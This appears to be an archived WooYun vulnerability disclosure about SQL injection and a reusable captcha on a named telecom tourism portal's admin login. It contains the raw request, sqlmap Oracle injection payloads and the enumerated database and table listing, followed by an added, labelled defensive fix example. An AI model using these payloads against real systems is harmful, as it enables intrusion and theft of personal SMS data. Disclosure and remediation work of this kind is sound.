WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
2014-11-11: Details sent to the vendor, awaiting vendor handling
2014-11-14: Vendor confirmed; details disclosed to the vendor only
2014-11-24: Details disclosed to core white hats and domain experts
2014-12-04: Details disclosed to regular white hats
2014-12-14: Details disclosed to intern white hats
2014-12-26: Details disclosed to the public
Yes, it's in the tens of millions...
Heilongjiang Telecom digital tourism portal, back-end admin maintenance link: http://www.gzbg100.cn/sysadmin/Login.aspx
The login page has SQL injection: entering ' in the username or password field produces a database error straight away.
The captcha is only checked for validity and never expires, so the same code can be reused across POST requests.
POST /sysadmin/Login.aspx HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.gzbg100.cn/sysadmin/Login.aspx
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.gzbg100.cn
Content-Length: 361
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=w0ctrju5zcbqdw55uiot0h45

__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUJOTI4MjE5NjI1ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUIYnRuTG9naW4FCGJ0blNwUmVnBmGi4hqICb4u6KAz35K7NqMua7k%3D&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=%2FwEWBgKXyKGvBAKl1bKzCQKd%2B7qdDgKY2YWXBgKC3IeGDAKNt7ybCQwP4hOwri06ABc6B3P7yglAd%2FNk&txtUserName=aaa&txtPwd=aaa&txtCheckCode=6146&btnLogin.x=0&btnLogin.y=0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtUserName
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwUJOTI4MjE5NjI1D2QWAgIDD2QWAgIHDw9kFgIeB29uY2xpY2sFFHJldHVybiBjaGVja0lucHV0KCk7ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUIYnRuTG9naW4FCGJ0blNwUmVnB5/qvGwf8XhrP/uBSB+IpTzXwNU=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBgLaxv3UCQKl1bKzCQKd+7qdDgKY2YWXBgKC3IeGDAKNt7ybCV7wzdzOvML8yuz7RZElCgc5cuOr&txtUserName=aaa' AND 7718=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(111)||CHR(103)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (7718=7718) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(121)||CHR(102)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND 'dHGr'='dHGr&txtPwd=aaa&txtCheckCode=0441&btnLogin.x=0&btnLogin.y=0

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwUJOTI4MjE5NjI1D2QWAgIDD2QWAgIHDw9kFgIeB29uY2xpY2sFFHJldHVybiBjaGVja0lucHV0KCk7ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUIYnRuTG9naW4FCGJ0blNwUmVnB5/qvGwf8XhrP/uBSB+IpTzXwNU=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBgLaxv3UCQKl1bKzCQKd+7qdDgKY2YWXBgKC3IeGDAKNt7ybCV7wzdzOvML8yuz7RZElCgc5cuOr&txtUserName=aaa' AND 7855=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'uHrR'='uHrR&txtPwd=aaa&txtCheckCode=0441&btnLogin.x=0&btnLogin.y=0
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
current schema (equivalent to database on Oracle): 'SYSMANAGER'
current user is DBA: False
available databases [18]:
[*] COUPON
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSMANAGER
[*] SYSTEM
[*] TG
[*] TSMSYS
[*] WMSYS
[*] XDB

Database: SYSMANAGER
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| SMSSEND_BACK                | 9966936 |
| SMS_APP_PHONES              | 8387577 |
| TBCUSTCOUNT                 | 897976  |
| SMSSEND                     | 743361  |
| TBCOUPONCARD                | 231471  |
| TB_GUEST_INFO               | 177577  |
| TB_ADV_CLICK                | 133270  |
| TEMP_SMS                    | 56955   |
| TB_COMMON_GUESTCOMMENT      | 22868   |
| TB_SSOLOGS                  | 19428   |
| RESTINFO                    | 13752   |
| RESTPIC                     | 9474    |
| TB_LOGINFO                  | 8270    |
| TB_HDM_PICTURE              | 3506    |
| TB_TLSUBPAGE_MAPTO_SCENIC   | 884     |
| TB_DINING_BASICINFO         | 694     |
| TB_TRAVEL_REGUSER           | 663     |
| SMS_APP_MESSAGES            | 609     |
| TBCOUPON                    | 595     |
| TB_TRAVEL_LINEPLAN          | 528     |
| TB_KEYWORDS_FILTER          | 525     |
| TB_NEWS_INFO                | 454     |
| TB_SCENIC_INFO              | 425     |
| TB_CODEDEFINE               | 409     |
| TB_SCENIC_RESERVE           | 332     |
| TB_AUTHORITY                | 329     |
| TB_SCENIC_INFO_BAK_0528     | 318     |
| TB_COMPLAINT                | 290     |
| TB_MARKET_INFO              | 271     |
| TB_HOTEL_BASEINFO           | 269     |
| TB_PLAY_BASEINFO            | 261     |
| TB_PERFORMER_INFO           | 242     |
| TBTERMINALTRAD              | 228     |
| TB_USERROLE                 | 163     |
| TBMERCHANT                  | 157     |
| TB_SCENIC_BAK               | 149     |
| TB_TRAVELINE_SUBPAGE_LEVEL2 | 149     |
| TB_ADV_INCOME               | 141     |
| TB_TRAVEL_LINE              | 132     |
| TB_ADV_DETAIL               | 126     |
| TB_USERINFO                 | 124     |
| TB_ORDER_HOTEL              | 115     |
| TB_VALIDCODE                | 113     |
| TB_FUNCTIONS111             | 103     |
| TB_FUNCTIONSBAK             | 103     |
| TB_FUNCTIONS                | 92      |
| TB_RAFFLE                   | 60      |
| TB_ORDER_SCENIC             | 55      |
| TB_TRAVEL_INFO              | 48      |
| TB_BALANCE                  | 42      |
| TB_COMMON_PAGESETINFO       | 40      |
| TBCATE                      | 40      |
| SMS_APP_USERINFO            | 39      |
| TB_ADV_LIMIT                | 34      |
| TB_ORDER_DINING             | 34      |
| TB_ADV_INFO                 | 30      |
| TB_TRAVELINE_SUBPAGE_LEVEL1 | 28      |
| TB_ORDER_PLAY               | 26      |
| MISSM_MESSAGE               | 24      |
| TB_KNOWLEDGEBASE_INFO       | 24      |
| TB_PAYLOG                   | 22      |
| TB_USR_INFO                 | 19      |
| TB_ROLES                    | 18      |
| TB_MISSMNEWS_INFO           | 17      |
| TB_NEWS_COLUMN              | 17      |
| TBCOUPOUORDER               | 16      |
| TB_ORDER_LINE               | 15      |
| TB_TRAVEL_BUSTYPE           | 15      |
| TB_DINING_CUISINETYPE       | 14      |
| TB_TRAVEL_GUIDE             | 14      |
| TB_TRAVEL_INCOME            | 14      |
| TB_AREA                     | 13      |
| TB_AREA_WEATHERURL          | 13      |
| TB_BUSINESS_INFO            | 13      |
| TB_TUAN_CITY                | 13      |
| TB_TRAVEL_GROUP             | 12      |
| TB_HOTEL_GROOMTYPE          | 10      |
| TB_MOBILE_AREA              | 10      |
| TB_MOBILE_VOUCHER           | 10      |
| TB_MOBILE_CODEDEFINE        | 9       |
| TB_CALENDAR                 | 8       |
| TB_MOBILE_SERVICE           | 8       |
| TB_SHOPPING_SCENIC          | 8       |
| TB_DEPARTMENT               | 7       |
| TB_MOBILE_CATEGORY          | 7       |
| TB_MOBILE_POSITION          | 7       |
| TB_MOBILE_SPACE             | 7       |
| TB_TUAN_DINGDAN             | 7       |
| TB_FAVORITES                | 6       |
| TB_MOBILE_COMPANY           | 6       |
| TB_MOBILE_CUSTOMER          | 6       |
| TMP_TESTORDER               | 6       |
| TB_ADVANCE_BOOKING          | 5       |
| TB_DINING_CUISINEINFO       | 5       |
| TB_TRAVEL_BUSINFO           | 5       |
| TBCOUPONUSER                | 5       |
| TB_KNOWLEDGEBASE_TYPE       | 4       |
| TB_MOBILE_PARAMETER         | 4       |
| TB_MOBILE_PRODUCT           | 4       |
| TB_PRIVILEGE                | 4       |
| TB_TUAN_CODEDEFINE          | 4       |
| TB_HOTEL_RESERVE            | 3       |
| TB_MOBILE_BOOKING           | 3       |
| TB_ORDER_THEMES             | 3       |
| TB_SSOSITE                  | 3       |
| TB_TUAN_USER                | 3       |
| TB_MOBILE_ADDRESS           | 2       |
| TB_MOBILE_ALBUM             | 2       |
| TB_MOBILE_MEDIA             | 2       |
| TB_MOBILE_SESSION           | 2       |
| TB_NEWS_TITLEPREV           | 2       |
| TB_TUAN_USERRELATION        | 2       |
| TB_BARCODE_CONFIG           | 1       |
| TB_MOBILE_AROUND            | 1       |
| TB_MOBILE_CAMERA            | 1       |
| TB_MOBILE_CRITICAL          | 1       |
| TB_MOBILE_DAILY             | 1       |
| TB_MOBILE_LOCATION          | 1       |
| TB_NEWS_CONTENTTEMPLATE     | 1       |
| TB_ROLLINFO                 | 1       |
| TB_TUAN_BBS                 | 1       |
| TB_TUAN_PROJECTS            | 1       |
| TB_VERSION                  | 1       |
+-----------------------------+---------+

Database: SYSMANAGER
Table: SMSSEND_BACK
[10 columns]
+------------+----------+
| Column     | Type     |
+------------+----------+
| ADDDATE    | DATE     |
| CONTENT    | VARCHAR2 |
| OUT_SMSID  | NUMBER   |
| PHONENUM   | VARCHAR2 |
| SENDDATE   | DATE     |
| SENDNUM    | VARCHAR2 |
| SENDRESULT | NUMBER   |
| SENDSTATUS | NUMBER   |
| SMSID      | NUMBER   |
| TYPE       | NUMBER   |
+------------+----------+

I won't paste the data.
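The report names two weaknesses in the login handler: the username is concatenated into the SQL statement (a single quote breaks the query), and the captcha is never invalidated, so one code works for every POST. The following is an added example, not code from the report or from the affected site, showing the minimal fixes a defender would apply: a parameterised credential lookup beside the concatenated form it replaces, and a captcha store that makes each code single-use and time-limited. sqlite3 stands in for the site's Oracle back end, and the table name tb_userinfo, its columns and the sample user are assumptions constructed for the demo.

```python
"""Added example (not from the original report): a login handler that fixes the
two weaknesses the report describes. sqlite3 stands in for the site's Oracle
back end; the tb_userinfo table, its columns and the demo user are assumed."""
import hashlib
import hmac
import secrets
import sqlite3
import time

CAPTCHA_TTL_SECONDS = 120


def _hash(password: str, salt: str) -> str:
    # Demo-only salted SHA-256; a real deployment would use a slow KDF.
    return hashlib.sha256((salt + password).encode()).hexdigest()


def build_db() -> sqlite3.Connection:
    """Constructed in-memory user store with one demo account."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE tb_userinfo (username TEXT PRIMARY KEY, salt TEXT, pwd_hash TEXT)"
    )
    salt = "demo-salt"
    conn.execute(
        "INSERT INTO tb_userinfo VALUES (?, ?, ?)", ("admin", salt, _hash("S3cret!", salt))
    )
    conn.commit()
    return conn


class CaptchaStore:
    """Issues captcha codes bound to a session, consumed on first use and
    rejected after CAPTCHA_TTL_SECONDS. The report's site accepted the same
    code on every POST; here a replayed code fails."""

    def __init__(self, now=time.time):
        self._now = now          # injectable clock so expiry can be tested
        self._pending = {}       # session_id -> (code, issued_at)

    def issue(self, session_id: str) -> str:
        code = f"{secrets.randbelow(10000):04d}"
        self._pending[session_id] = (code, self._now())
        return code

    def consume(self, session_id: str, submitted: str) -> bool:
        entry = self._pending.pop(session_id, None)   # pop: single use
        if entry is None:
            return False
        code, issued_at = entry
        if self._now() - issued_at > CAPTCHA_TTL_SECONDS:
            return False
        return hmac.compare_digest(code, submitted)


def vulnerable_lookup(conn, username: str):
    """The pattern the report implies: user input concatenated into SQL.
    A single quote in the username breaks the statement (the report's
    'enter a quote and it errors out')."""
    sql = f"SELECT pwd_hash, salt FROM tb_userinfo WHERE username = '{username}'"
    return conn.execute(sql).fetchone()


def quote_breaks_query(conn, username: str = "aaa'") -> bool:
    """True when the concatenated query fails on this input."""
    try:
        vulnerable_lookup(conn, username)
        return False
    except sqlite3.Error:
        return True


def safe_lookup(conn, username: str):
    """Parameterised version: the quote is just data, never SQL."""
    sql = "SELECT pwd_hash, salt FROM tb_userinfo WHERE username = ?"
    return conn.execute(sql, (username,)).fetchone()


def login(conn, captchas: CaptchaStore, session_id: str,
          username: str, password: str, captcha: str) -> str:
    """Captcha is checked first and consumed regardless of the outcome."""
    if not captchas.consume(session_id, captcha):
        return "captcha rejected"
    row = safe_lookup(conn, username)
    if row is None:
        return "invalid credentials"
    pwd_hash, salt = row
    if not hmac.compare_digest(pwd_hash, _hash(password, salt)):
        return "invalid credentials"
    return "ok"


if __name__ == "__main__":
    db = build_db()
    print("quote breaks concatenated query:", quote_breaks_query(db))
    store = CaptchaStore()
    code = store.issue("s1")
    print(login(db, store, "s1", "admin", "S3cret!", code))   # ok
    print(login(db, store, "s1", "admin", "S3cret!", code))   # captcha rejected
```

The captcha is consumed before the credential check so that a wrong password cannot be retried under the same code, and the single-use rule is enforced by popping the entry rather than by a flag, which closes the replay the report describes.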
Filter input.
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2014-11-14 17:46
None yet.